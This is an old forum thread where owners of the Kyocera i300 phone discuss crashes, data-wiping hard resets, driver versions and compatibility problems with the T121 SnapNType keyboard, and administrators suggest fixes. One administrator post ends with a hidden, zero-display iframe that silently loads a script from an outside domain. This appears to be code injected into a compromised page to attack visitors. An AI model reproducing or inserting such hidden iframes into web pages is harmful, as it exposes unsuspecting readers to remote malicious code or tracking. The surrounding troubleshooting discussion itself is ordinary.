+ Reply to Thread
Page 1 of 2 1 2 LastLast

Angry Problems with the T121...

I have had the T121 for a few days now and ....
    The intial driver sent with the phone was horrible, at least 80% of the time the phone function was used, either with voice or data the phone needed to be reset (Fatal Error). I then e-mail them and they sent me another driver about 10KB smaller than the origial which was about 80KB and.... I have had to Hard Reset 3 TIMES!!!!!!!!!!.
    This has occured with using the phone function as well, but this time it doesnt say fatal error, it just freezes and when you you reset it, all you data is wiped clean...VERY ANNOYING!!. I have emailed once again and I am waiting for a reply....Anyone else having this problem with theirs???....Let me know!!
    Steve a.k.a. Superman a.k.a. Kal-El

No. I have not. I've had 2 versions of the driver as well and neither has caused such errors for me. Perhaps others have had a similar experience. I hope not, and that this is just a problem with some software you have on your 300. I know extensive testing was run for the T121 so the guys at TT-Tec should be more than willing to assist.

2 copies....

Was there a problem with the original driver on the 3 1/2 floppy for you to have another driver?

The intial driver sent with the phone was horrible, at least 80% of the time the phone function was used, either with voice or data the phone needed to be reset (Fatal Error).
    wow.... that doesn't sound good. Had to think a minute but I think I have had only one call with the T121 in use & with no probs. Anyone else having this problem?????.. is the 2nd driver an update to the first that we should all get????
    .....beam me up Scotty...

Re: Problems with the T121...

Originally posted by mrkalel
    it just freezes and when you you reset it, all you data is wiped clean...
    I too have had a hard reset and lost everything. I was hanging-up a regular phone call with the T121 attached when I froze up and had to do the pin thing. A few seconds later, the opening Palm screen kept flashing on and off rapidly. The only button that responded was the main power button which gave me two options; I don't remember what the first one was but it didn't work. I had to do the second one which was "lose all data".

After a restore, ( thank you BackupBuddy) everything worked except for Eudora and Web Browser which I had to re-install. I still freeze up often when ending a call but the pin reset works.

It's like I have to walk on egg-shells -- I never know when I'll lock up.

Should I boter with the new driver?
    I love my i300. It has simplified my life...

...and I love my new SnapNType keyboard

I have had my T121 since the first few days they started shipping, and I really enjoy it, but I have noticed a few quirks...

1) Incompatible with FastCPU. I usually have my i300 clocked to 42 mhz, and if I enable the T121, I can only type in the little "test box" in the keyboard app. The application buttons will also launch that specific app, but from there, the KB is unresponsive. Disable FastCPU, everything works fine...so I have been disabling FastCPU when I use the kb...

2) Sometimes locks up after about 20 minutes of use. I don't see a pattern here, it is real sporadic...

3) Sometimes it will show as "enabled" (no red slash), but it won't work. If I disable it, then enable it again, it works. Very minor problem...

As for the driver, what is the most recent version? I never used the driver that came with the kb, I d/l'ed the 1.30 driver from tt-tec.com. Is 1.30 the most recent version? If not, can someone with a newer one email it to me? 1.30 is the current one on their site...

Thanks,
    Chris
    cking@idworld.net

Just to let you know....

I have downloaded the driver off the web site, and (fingers-crossed/knock on wood) so far no resets. BTW...I have also noticed the quirky no work/ work thing...rock the phone into the keyboard, the connection is not perfect and im pretty sure thats what it is.

P.S. What exactly is BackUpBuddy???
    Is it that much better than Palm Desktop 4???

Administrator

Arrow

bb and the desktop are virtually the same in regards to the i300, so dont waste your money and go purchase it...

i dl'ed the final version of the driver off the website andhave not experienced any issues.

overclocking seems to mess with it (based on an earlier post) and also some hacks could be interfering with it. but all i can say is that theres no issues here.

The initial driver I referred to was that which I received in early beta testing phases. The version that ships with the unit has been updated and further updates may be available on their site.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Seeing the crashes too

Just posted a new thread about this before I saw this one...

I've been using the SnapNType keyboard since last week and really like the hardware. Unfortunately I have had some major pains recently with the phone crashing and getting into an unrecoverable state. Soft reseting takes it to the boot up Palm screen but with video 'static' on it and it seems to then get stuck in a loop of just bringing up that screen and never coming up live. The only way to bring it back is to hard reset and blow away all the data and apps.

It seems to be triggered most times when using the keyboard in Eudora for email. I can't say I've noticed the link to voice calls but I'm definitely using data calls in Eudora when it's happening.

Other hack/driver sw installed:
    i300KeyboardLock hack
    i300Alarm hack
    XMaster

Re: Seeing the crashes too

Originally posted by Bramage
    It seems to be triggered most times when using the keyboard in Eudora for email. I can't say I've noticed the link to voice calls but I'm definitely using data calls in Eudora when it's happening.
    Funny, I have more problrms trying to end a voice call.

Re: Re: Seeing the crashes too

Originally posted by MisterTransisto

Funny, I have more problrms trying to end a voice call.
    I'm definitely not saying that I don't have problems with the voice calls -- just that I can't tie it to the crashes yet.

Are you running any hacks or just the keyboard driver?

This has been really frustrating to deal with -- I'm not sure I like the idea of being able to 'crash my phone'.

Re: Re: Re: Seeing the crashes too

Originally posted by Bramage

Are you running any hacks or just the keyboard driver?
    Just the keyboard driver.

Question I was wondering...

Does anyone know of where to get a nice case for our keyboard...I mean i dont want to go and get just a regular pouch or something. I would love something made for it specifically...Let me know if anyone knows were to get something like that....

Lightbulb

Maybe we can get Vaja to make one of their leather cases that holds the phone while the keyboard is attached? Or do you think that would be too bulky? Their cases are great, I have one for my iPaq that holds it along with the dual-pc card sleeve. Nothing could be as bulky as this beast...It even has a cutout on top for the wireless card...works great!

BTW - I answered a call last nite on my i300 with the kb attached, and it worked great...the person on the other end told me it sounded like a normal call...best of all, no lock ups...

CK

I-300 Novice

Subject Heading on Thread

How about relabeling the 'subject' on this thread to 'Snap N Type Keyboard' ?

It would make searches much easier for us novices...thanks!
    Ahmed V. Ismail
    A Smartphone Addict

I recd and installed snap n type today, folllowing all the instructions, and it simply wont work.

I get the snap n type logo in applications, click on enable and NOTHING. wont even type in the test area.

Any help would be greatly appreciated.

thanks

Mike
    michaelb92

Administrator

Arrow

make sure the board is fully connected to the phone. make sure you have the correct version. i do believe there is a later version than what came with the product thats out on their site.

also, fully uninstall it and reinstall it.

Hi Marc

Well, I uninstalled and reinstalled. Also checked the version and I have 13 which seems to be the latest.

As always, appreciate your help, but still stuck and still have not heard from them.

I sure do like the sites where you can pick up the good old
    phone and talk to someone instead of being forced to send them an email.
    michaelb92

Administrator

Arrow

sorry for the bad start..

did yuo do a warm reset? (if you have launcher III you can select it from the pull down menu)

worse case you may have to cold boot!